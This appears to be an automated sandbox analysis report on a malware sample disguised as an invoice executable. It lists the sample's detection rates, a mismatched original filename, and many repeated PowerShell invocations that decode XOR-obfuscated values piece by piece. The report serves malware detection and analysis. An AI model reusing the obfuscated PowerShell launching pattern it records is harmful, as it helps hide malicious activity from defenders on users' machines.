Source: C:\Users\user\Desktop\INVOICE-98656789.exe

Code function: 0_2_70351B28

0_2_70351B28

Sample file is different than original file name gathered from version info

Source: INVOICE-98656789.exe, 00000000.00000002.3245453364.00000000007B4000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameblindages.exe` vs INVOICE-98656789.exe
Source: INVOICE-98656789.exe	Binary or memory string: OriginalFilenameblindages.exe` vs INVOICE-98656789.exe

Tries to load missing DLLs

Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Section loaded: edgegdi.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: edgegdi.dll

Source: INVOICE-98656789.exe	Virustotal: Detection: 25%
Source: INVOICE-98656789.exe	ReversingLabs: Detection: 18%

Source: C:\Users\user\Desktop\INVOICE-98656789.exe

File read: C:\Users\user\Desktop\INVOICE-98656789.exe

Jump to behavior

Source: INVOICE-98656789.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\INVOICE-98656789.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\INVOICE-98656789.exe C:\Users\user\Desktop\INVOICE-98656789.exe
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x7573672D -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x33323865 -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x53686D28 -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x57696C3B -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x6F772A36 -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x72352E36 -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x30292272 -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x6B657031 -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x656C316D -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x3A3A412D -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x6561763A -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x46696E3A -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x41286F7F -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x72342273 -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x2069226F -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x7838326F -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x3030326F -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x302C2236 -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x20302E7F -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x70203273 -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x2069226B -bxor 607}
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x2C206B7F -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x30783A6F -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x2C206B7F -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x30296B71 -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x72332272 -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x6B657031 -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x656C316D -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x3A3A5436 -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x7274773E -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x6C416E33 -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x6F632A36 -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x302C6B7F -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x3539366B -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x3131376D -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x2C206B7F -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x3078316F -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x30302E7F -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x69203227 -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x34302B2F -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x2E723372 -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x6B657031 -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x656C316D -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x3A3A513A -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x74466B33 -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x6E74672D -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x2869706C -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x3734306B -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x202C2236 -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x20302E36 -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x20302B36 -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x2E723072 -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x6B657031 -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x656C316D -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x3A3A503A -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x61644436 -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x6C652A36 -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x72332E7F -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x6920706E -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x2C206B7F -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x3539366B -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x3131376D -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x2C2A6B7F -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x302C2236 -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x20302B36 -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x7573672D -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x33323865 -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x57696C3B -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x6F77522D -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x6F634377 -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x6972337F -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x2C69226F -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
